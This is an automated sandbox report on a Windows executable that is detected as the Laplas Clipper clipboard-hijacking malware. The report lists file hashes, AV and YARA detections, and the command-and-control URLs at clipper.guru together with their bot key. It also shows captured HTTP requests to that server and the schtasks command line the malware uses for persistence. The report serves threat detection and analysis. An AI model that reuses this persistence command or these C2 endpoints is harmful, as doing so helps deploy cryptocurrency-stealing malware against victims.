Windows Analysis Report
IVO2cpEukR.exe

Overview

General Information

Sample Name: IVO2cpEukR.exe
Analysis ID: 736208
MD5: 6738634d9b3bfcf7ebca8be48c091b3e
SHA1: f08091a4b3f5c167bcdfa565584bed8ed2a69f0c
SHA256: 8c77759eff69330a5c9697d05e2a0f99c6edff904bdd52a048df0461d0459b27
Tags: exeLaplasClipper
Infos:

Detection

Laplas Clipper, MicroClip
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MicroClip
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Laplas Clipper
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

AV Detection

barindex
Source: IVO2cpEukR.exe ReversingLabs: Detection: 14%
Source: http://clipper.guru/bot/online?guid=computer Avira URL Cloud: Label: phishing
Source: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe ReversingLabs: Detection: 14%
Source: IVO2cpEukR.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Joe Sandbox View IP Address: 45.159.189.115 45.159.189.115
Source: svcupdater.exe, 00000004.00000002.522718471.000000C000186000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://clipper.guru/bot/online?guid=computer
Source: svcupdater.exe, 00000004.00000002.522749478.000000C000192000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
Source: unknown DNS traffic detected: queries for: clipper.guru
Source: global traffic HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: IVO2cpEukR.exe ReversingLabs: Detection: 14%
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File read: C:\Users\user\Desktop\IVO2cpEukR.exe Jump to behavior
Source: IVO2cpEukR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\IVO2cpEukR.exe C:\Users\user\Desktop\IVO2cpEukR.exe
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File created: C:\Users\user\AppData\Roaming\ipXroBUdMG Jump to behavior
Source: classification engine Classification label: mal84.troj.spyw.winEXE@7/3@3/1
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: IVO2cpEukR.exe Static file information: File size 5021696 > 1048576
Source: IVO2cpEukR.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: IVO2cpEukR.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x269800
Source: IVO2cpEukR.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x208e00
Source: IVO2cpEukR.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: IVO2cpEukR.exe Static PE information: section name: .symtab
Source: svcupdater.exe.0.dr Static PE information: section name: .symtab
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: svcupdater.exe, 00000004.00000002.522992248.0000023E77048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: IVO2cpEukR.exe, 00000000.00000002.258406632.0000028D55C4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IVO2cpEukR.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs